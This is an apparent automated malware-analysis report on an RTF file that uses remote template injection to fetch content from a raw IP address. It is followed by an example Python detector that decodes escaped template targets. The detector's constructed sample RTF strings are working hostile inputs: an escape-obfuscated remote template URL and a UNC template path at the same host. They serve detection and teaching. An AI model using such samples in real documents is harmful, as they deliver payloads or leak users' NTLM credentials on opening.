MALICIOUS
Risk Score: 62
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The RTF document triggers a critical-severity heuristic for remote template injection: its \*\template destination points at http://45.197.132.68/public/img/fav.ico. Word fetches and loads such a template when the document is opened, so the technique is commonly used to download and execute a malicious second-stage payload. The minimal document body provides no further context, but a remote template target on its own is strong evidence of an attempt to compromise the user's system.
Heuristics 2
- Remote template injection (\*\template → remote URL) | critical | RTF_REMOTE_TEMPLATE
  The RTF's \*\template destination is a remote URL/UNC path. When Word opens the document it fetches and loads that template, which can carry macros or an exploit, deliver a scriptlet/HTA, or leak NTLM credentials over UNC. Benign documents attach only a local template, so a remote \*\template target is template-injection delivery (MITRE T1221).
  Evidence: remote \*\template target (Word fetches it on open); destination obfuscated with \uN/\'xx escapes; raw IP host 45.197.132.68.
- Embedded URL | info | EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URLs:
  - http://45.197.132.68/public/img/fav.ico (the \*\template target above)
  - http://schemas.microsoft.com/office/word/2003/wordml (the WordprocessingML 2003 namespace URI, a schema identifier rather than a resource the document fetches)
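The check the RTF_REMOTE_TEMPLATE heuristic describes, as an added example that is not the analyzer's own code: it pulls every \*\template destination out of an RTF document, resolves the \'xx and \uN escapes the heuristic flags as obfuscation, and labels the decoded target as remote (URL scheme or UNC prefix) and as a raw dotted-quad IP host. The three sample documents are constructed for this example; only the remote target comes from the report above.

```python
import re

# Body of an RTF {\*\template ...} destination group (the template Word
# attaches, and fetches if remote, when the document is opened).
_TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\b\s*(.*?)\}", re.DOTALL)
# Unicode escape \uN; N is negative for code points >= 0x8000.
_UNICODE_ESC = re.compile(r"\\u(-?\d+)")
# Any other control word, e.g. \ansi or \f0, plus its optional space delimiter.
_CONTROL_WORD = re.compile(r"\\[a-zA-Z]+-?\d* ?")
# Remote targets: a URL scheme (http://, https://, file://, ...) or a UNC
# prefix (\\host\share). Local templates are bare names or drive paths.
_REMOTE_TARGET = re.compile(r"^(?:[a-z][a-z0-9+.\-]*://|\\\\|//)")
# Remote target whose host is a raw dotted-quad IP (the 45.197.132.68 case).
_RAW_IP_HOST = re.compile(
    r"^(?:[a-z][a-z0-9+.\-]*://|\\\\|//)\d{1,3}(?:\.\d{1,3}){3}(?:[/:\\]|$)")


def decode_rtf_escapes(raw: str) -> str:
    """Resolve \\'xx hex and \\uN unicode escapes; drop other control words."""
    out, i, n = [], 0, len(raw)
    while i < n:
        ch = raw[i]
        if ch == "\\":
            if raw.startswith("\\'", i) and i + 4 <= n:      # \'xx: one byte as hex
                out.append(chr(int(raw[i + 2:i + 4], 16)))
                i += 4
                continue
            m = _UNICODE_ESC.match(raw, i)                     # \uN: one code point
            if m:
                cp = int(m.group(1))
                out.append(chr(cp + 0x10000 if cp < 0 else cp))
                i = m.end()
                if i < n and raw[i] == " ":                    # optional delimiter
                    i += 1
                if i < n and raw[i] not in "\\{}":             # one fallback char (\uc1 default)
                    i += 1
                continue
            m = _CONTROL_WORD.match(raw, i)                    # \word or \wordN: skip
            if m:
                i = m.end()
                continue
            if i + 1 < n:                                      # control symbol: \\ \{ \}
                out.append(raw[i + 1])
                i += 2
                continue
            i += 1
        elif ch in "{}\r\n":                                   # group braces, line breaks
            i += 1
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def scan_rtf(data) -> list:
    """One finding per \\*\\template destination: decoded target plus labels."""
    text = data.decode("latin-1") if isinstance(data, bytes) else data
    findings = []
    for m in _TEMPLATE_GROUP.finditer(text):
        raw = m.group(1)
        target = decode_rtf_escapes(raw).strip()
        findings.append({
            "target": target,
            "remote": bool(_REMOTE_TARGET.match(target.lower())),
            "obfuscated": "\\'" in raw or bool(_UNICODE_ESC.search(raw)),
            "raw_ip_host": bool(_RAW_IP_HOST.match(target.lower())),
        })
    return findings


# Constructed sample documents (not the analysed file). The first hides the
# report's URL behind \uN escapes, the second spells a UNC path with \'xx.
SAMPLE_UNICODE_ESCAPED = (
    r"{\rtf1\ansi\deff0{\*\template \u104?\u116?\u116?\u112?://45.197.132.68/public/img/fav.ico}"
    r"{\fonttbl{\f0 Calibri;}}\f0 x\par}"
)
SAMPLE_HEX_UNC = r"{\rtf1\ansi{\*\template \'5c\'5c45.197.132.68\'5cshare\'5cfav.dotm}\par}"
SAMPLE_BENIGN = r"{\rtf1\ansi{\*\template Normal.dotm}\par}"

if __name__ == "__main__":
    for name, doc in [("unicode-escaped URL", SAMPLE_UNICODE_ESCAPED),
                      ("hex-escaped UNC", SAMPLE_HEX_UNC),
                      ("benign local", SAMPLE_BENIGN)]:
        for f in scan_rtf(doc):
            verdict = "RTF_REMOTE_TEMPLATE" if f["remote"] else "local template"
            print(f"{name}: {verdict} -> {f['target']!r} "
                  f"(obfuscated={f['obfuscated']}, raw_ip_host={f['raw_ip_host']})")
```

The escapes are resolved before the remote check because that is exactly where a string-match rule on "http://" fails: the obfuscated sample never contains that literal, yet Word resolves it to the same target. A decoded target with a UNC prefix is reported as remote as well, since that is the variant that leaks NTLM credentials rather than fetching a payload.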